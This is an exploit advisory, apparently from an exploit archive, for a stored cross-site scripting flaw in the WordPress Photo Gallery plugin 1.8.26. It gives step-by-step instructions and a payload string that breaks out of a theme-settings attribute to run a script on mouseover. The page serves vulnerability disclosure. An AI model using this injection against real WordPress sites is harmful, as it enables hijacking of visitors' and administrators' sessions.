WordPress Photo Gallery 1.8.26 Cross Site Scripting

WordPress Photo Gallery 1.8.26 Cross Site Scripting
Posted Jul 4, 2024
Authored by tmrswrr

WordPress Photo Gallery plugin version 1.8.26 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 620cac705498df4446e350abd9066b0001ddae26019194a472b3a79d8cbd69cd
Download | Favorite | View
# Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS
# Date: 2024-07-03
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/
# Version 1.8.26
### Steps to Execute the Payload:
1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 
2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed

نوشته های مشابه

Ubuntu Security Notice USN-6876-1

Ubuntu Security Notice USN-6878-1

Gentoo Linux Security Advisory 202407-10

Gentoo Linux Security Advisory 202407-11